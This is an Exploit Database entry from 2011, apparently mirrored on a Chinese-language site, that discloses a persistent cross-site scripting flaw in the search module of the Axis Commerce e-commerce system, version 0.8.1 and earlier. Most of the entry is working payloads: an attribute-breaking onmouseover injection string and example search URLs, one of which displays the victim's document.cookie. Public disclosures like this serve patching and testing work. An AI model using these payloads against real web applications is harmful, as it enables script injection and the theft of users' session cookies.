Axis Commerce (E-Commerce System) – Persistent Cross-Site Scripting

• Exploit Database
• 12 阅读

• 作者： Eyup CELIK
  日期： 2011-08-20
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/17703/

• # Exploit Title: Axis Commerce (E-Commerce System) Stored XSS
  # Date: 19.08.2011
  # Author: Eyup CELIK
  # Software Link: https://github.com/downloads/axis/axiscommerce/axis-0.8.1.zip
  # Version: 0.8.1 and previus
  # Tested on: Apache (For Windows)
  
  ISSUE
  
  Vulnerable Modules => Search Module
  
  XSS can be done using the command input
  
  Example Code: " onmouseover=prompt(XSS Code) bad="
  
  Example:
  
  http://localhost/axis-0.7.0.4/search/result?q="onmouseover=prompt(906764) bad="
  
  http://localhost/axis-0.7.0.4/search/result?q="onmouseover=prompt(document.cookie) bad="